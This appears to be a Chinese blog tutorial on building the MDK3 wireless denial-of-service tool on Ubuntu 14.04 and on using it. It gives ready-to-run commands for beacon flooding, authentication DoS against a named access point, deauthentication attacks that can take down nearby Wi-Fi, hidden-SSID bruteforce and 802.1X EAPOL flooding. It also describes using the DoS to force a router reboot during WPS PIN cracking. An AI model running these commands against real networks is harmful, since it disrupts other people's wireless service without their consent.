Ubuntu 14.04 安装 mdk3 及 使用测试

MDK3 简介

MDK3 是一款无线DOS 攻击测试工具,能够发起Beacon Flood、Authentication DoS、Deauthentication/Disassociation Amok 等模式的攻击,另外它还具有针对隐藏ESSID 的暴力探测模式、802.1X 渗透测试、WIDS干扰等功能。

安装过程

  • 首先获取源代码
1
2
3
wget http://linux.gungoos.com/mdk3-v6.tar.gz
tar xvzf mdk3-v6.tar.gz
cd mdk3-v6

如果遇到这种错误

1
2
3
4
5
--2015-08-14 20:50:36-- http://linux.gungoos.com/mdk3-v6.tar.gz
正在解析主机 linux.gungoos.com (linux.gungoos.com)... 185.27.134.115
正在连接 linux.gungoos.com (linux.gungoos.com)|185.27.134.115|:80... 已连接。
已发出 HTTP 请求,正在等待回应... 403 Forbidden
2015-08-14 20:50:37 错误 403Forbidden

试试直接用Firefox访问那个地址下载吧。

  • 修改Makefile文件
1
sudo nano Makefile

将 “-lpthread” 替换成 “-pthread”。之后按ctrl + x -> Y (enter) -> enter

  • 编译
1
sudo make

这里make之后会刷出很多warnings,但并不影响编译。

  • 安装
1
sudo make install
  • 测试
1
sudo mdk3

测试环境

系统: Ubuntu 14.04
网卡: TP-LINK TL-WN722N
路由器: FAST FW150R

MDK3 使用方法

查看帮助

1
sudo mdk3 --fullhelp

Beacon Flood Mode

详细介绍

这个模式可以产生大量死亡SSID来充斥无线客户端的无线列表,从而扰乱无线使用者;我们甚至还可以自定义发送死亡SSID的BSSID和ESSID、加密方式(如wep/wpa2)等。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
mdk3 mon0 b
-n <ssid> #自定义ESSID
-f <filename> #读取ESSID列表文件
-v <filename> #自定义ESSID和BSSID对应列表文件
-d #自定义为Ad-Hoc模式
-w #自定义为wep模式
-g #54Mbit模式
-t # WPA TKIP encryption
-a #WPA AES encryption
-m #读取数据库的mac地址
-c <chan> #自定义信道
-s <pps> #发包速率
mdk3 --help b #查看详细内容

示例一

1
sudo mdk3 mon0 b -f wordlist1.txt -a -c 6 -s 80

./wordlist1.txt

1
2
burpS
WPSHAK

示例二

固定FakeAP的MAC

1
sudo mdk3 mon0 b -v wordlist2.txt -a -c 6 -s 80

./wordlist2.txt

1
2
AA:BB:CC:DD:AA:EE burpSuite
11:22:33:DD:AA:EE WPSHAK

效果说明

PC可以容易看到 FakeAP,但是 Android 的 WLAN 扫描不容易看到,原因暂不明。

Authentication DoS Mode

详细说明

这是一种验证请求攻击模式:在这个模式里,软件自动模拟随机产生的mac向目标AP发起大量验证请求,可以导致AP忙于处理过多的请求而停止对正常连接客户端的响应;这个模式常见的使用是在 reaver 穷据路由 PIN 码,当遇到AP被“pin死”时,可以用这个模式来直接让AP停止正常响应,迫使AP主人重启路由。

1
2
3
4
5
6
mdk3 mon0 a
-a <ap_mac> #测试指定BSSID
-m #使用有效数据库中的客户端mac地址
-c #对应 -a ,不检查是否测试成功
-i <ap_mac> #对指定BSSID进行智能攻击
-s <pps> #速率,默认50

示例一

1
sudo mdk3 mon0 a -a EC:88:8F:A1:A5:90 -s 200

似乎无效
手机连接AP正常上网

Deauthentication/Disassociation Amok Mode

详细说明

这个模式看名称就知道大概了:强制解除验证解除连接!在这个模式下,软件会向周围所有可见AP发起循环攻击……可以造成一定范围内的无线网络瘫痪(当然有白名单,黑名单模式),直到手动停止攻击。

1
2
3
4
5
mdk3 mon0 d
-w <filename> #白名单mac地址列表文件
-b <filename> #黑名单mac地址列表文件
-s <pps> #速率,这个模式下默认无限制
-c [chan,chan,chan,...] #信道,可以多填,如 2,4,5,1

示例一

1
sudo mdk3 d -s 120 -c 1,6,11

Basic probing and ESSID Bruteforce Mode

详细介绍

基本探测AP信息和ESSID猜解模式

1
2
3
4
5
6
mdk3 mon0 p
-e <ssid> #待检测的ssid
-f <filename> #检测AP设置为隐藏的ssid列表文件
-t <bssid> #用bssid检测AP的信息
-s <pps> #速率,默认300
-b <character set> #设置字符集

802.1X tests Mode

详细介绍

802.1X 协议下的攻击测试

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
mdk3 mon0 x
0 - EAPOL Start packet flooding #EAPOL格式的报文洪水攻击
-n <ssid>
-t <bssid> #目标客户端的mac地址
-w <WPA type>
Set WPA type (1: WPA, 2: WPA2/RSN; default: WPA)
-u <unicast cipher>
Set unicast cipher type (1: TKIP, 2: CCMP; default: TKIP)
-m <multicast cipher>
Set multicast cipher type (1: TKIP, 2: CCMP; default: TKIP)
-s <pps> #速率,默认400
1 - EAPOL Logoff test #注销认证攻击
-t <bssid> #目标客户端的mac地址
-c <bssid> #目标ap的合法客户端mac
-s <pps> #速率,默认400

参考资料

[1] Install mdk3 on Ubuntu 14.04
[2] 印尼语神奇资料请在google translate帮助下服用
[3] 无线攻击神器–MDK3 使用方法
[4] 无线Hacking之D.O.S与AP欺骗
[5] MDK3-无线拒绝服务攻击的开始
[6] Kali mdk3项目页面
[7] 项目页